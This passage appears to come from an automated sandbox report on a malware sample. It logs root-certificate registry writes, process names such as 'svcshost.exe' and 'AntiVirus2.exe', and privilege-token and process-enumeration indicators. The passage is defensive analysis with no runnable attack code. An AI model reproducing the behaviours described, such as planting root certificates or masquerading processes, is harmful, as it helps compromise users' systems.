fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	vpn-1002.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	vpn-1002.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	eagleget-2-1-6-50.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	kat4B14.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	vpn-1002.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	vpn-1002.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	kat5C72.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	kat4B14.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	New Text Document mod.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

5100 regedit.exe
8376 regedit.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

6672 PING.EXE
3776 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

svcshost.exe

pid process

548 svcshost.exe

pid	process
5100	regedit.exe
8376	regedit.exe

pid	process
6672	PING.EXE
3776	PING.EXE

pid	process
548	svcshost.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

Processes:

Setup.exewin1.execomp.exeoutput.exesvcshost.exekat4B14.tmppowershell.exepowershell.exeprint.exeupdater.execonhost.exekat5C72.tmp

pid	process
8456	Setup.exe
8456	Setup.exe
8664	win1.exe
8664	win1.exe
8664	win1.exe
8636	comp.exe
8636	comp.exe
8664	win1.exe
1000	output.exe
8664	win1.exe
8664	win1.exe
8664	win1.exe
8664	win1.exe
8664	win1.exe
8664	win1.exe
8664	win1.exe
548	svcshost.exe
3436	kat4B14.tmp
8664	win1.exe
5968	powershell.exe
6336	powershell.exe
8664	win1.exe
8664	win1.exe
7676	print.exe
7676	print.exe
7676	print.exe
7676	print.exe
7676	print.exe
7676	print.exe
7676	print.exe
7676	print.exe
3772	updater.exe
3772	updater.exe
3772	updater.exe
3772	updater.exe
3772	updater.exe
3772	updater.exe
4208	conhost.exe
4208	conhost.exe
8664	win1.exe
4208	conhost.exe
4208	conhost.exe
5812	kat5C72.tmp

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Setup.execomp.exe

pid process

8456 Setup.exe
8636 comp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document mod.exeAntiVirus2.exesvchost.exewin1.exealabi.execsc.exe7z.exe7z.exe7z.exesvcshost.exetaskkill.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeDebugPrivilege	2740	New Text Document mod.exe
Token: SeDebugPrivilege	684	AntiVirus2.exe
Token: SeDebugPrivilege	8588	svchost.exe
Token: SeDebugPrivilege	8664	win1.exe
Token: SeDebugPrivilege	8588	svchost.exe
Token: SeDebugPrivilege	3008	alabi.exe
Token: SeDebugPrivilege	6724	csc.exe
Token: SeRestorePrivilege	2824	7z.exe
Token: 35	2824	7z.exe
Token: SeSecurityPrivilege	2824	7z.exe
Token: SeSecurityPrivilege	2824	7z.exe
Token: SeRestorePrivilege	2124	7z.exe
Token: 35	2124	7z.exe
Token: SeSecurityPrivilege	2124	7z.exe
Token: SeSecurityPrivilege	2124	7z.exe
Token: SeRestorePrivilege	2584	7z.exe
Token: 35	2584	7z.exe
Token: SeSecurityPrivilege	2584	7z.exe
Token: SeSecurityPrivilege	2584	7z.exe
Token: SeDebugPrivilege	548	svcshost.exe
Token: SeDebugPrivilege	1004	taskkill.exe
Token: SeDebugPrivilege	5968	powershell.exe
Token: SeDebugPrivilege	6336	powershell.exe
Token: SeShutdownPrivilege	5372	powercfg.exe
Token: SeShutdownPrivilege	6196	powercfg.exe
Token: SeShutdownPrivilege	7240	powercfg.exe
Token: SeShutdownPrivilege	6428	powercfg.exe
Token: SeShutdownPrivilege	3840	powercfg.exe
Token: SeShutdownPrivilege	3788	powercfg.exe
Token: SeShutdownPrivilege	3816	powercfg.exe
Token: SeShutdownPrivilege	764	powercfg.exe
Token: SeLockMemoryPrivilege	4208	conhost.exe
Token: SeRestorePrivilege	2252	7z.exe
Token: 35	2252	7z.exe
Token: SeSecurityPrivilege	2252	7z.exe
Token: SeSecurityPrivilege	2252	7z.exe
Token: SeRestorePrivilege	9180	7z.exe
Token: 35	9180	7z.exe
Token: SeSecurityPrivilege	9180	7z.exe
Token: SeSecurityPrivilege	9180	7z.exe
Token: SeRestorePrivilege	320	7z.exe
Token: 35	320	7z.exe
Token: SeSecurityPrivilege	320	7z.exe
Token: SeSecurityPrivilege	320	7z.exe
Token: SeRestorePrivilege	2872	7z.exe
Token: 35	2872	7z.exe
Token: SeSecurityPrivilege	2872	7z.exe
Token: SeSecurityPrivilege	2872	7z.exe
Token: SeRestorePrivilege	2992	7z.exe
Token: 35	2992	7z.exe
Token: SeSecurityPrivilege	2992	7z.exe
Token: SeSecurityPrivilege	2992	7z.exe
Token: SeRestorePrivilege	2956	7z.exe
Token: 35	2956	7z.exe
Token: SeSecurityPrivilege	2956	7z.exe
